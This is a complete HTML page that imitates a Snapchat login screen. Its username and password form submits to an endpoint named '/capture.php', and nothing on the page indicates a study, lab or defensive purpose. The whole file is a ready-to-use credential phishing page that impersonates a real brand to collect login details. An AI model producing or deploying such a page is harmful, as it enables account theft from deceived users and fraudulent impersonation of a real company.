<!DOCTYPE html>
<html>
<head>
    <style>
        body { background: #fffc00; font-family: 'Avenir Next', sans-serif; }
        .container { max-width: 300px; background: white; border-radius: 10px; padding: 20px; }
        .logo { color: #000; text-align: center; font-weight: bold; font-size: 24px; }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">Snapchat</div>
        <form action="/capture.php" method="POST">
            <input type="text" name="username" placeholder="Username" required><br>
            <input type="password" name="password" placeholder="Password" required><br>
            <button type="submit">LOG IN</button>
        </form>
    </div>
</body>
</html>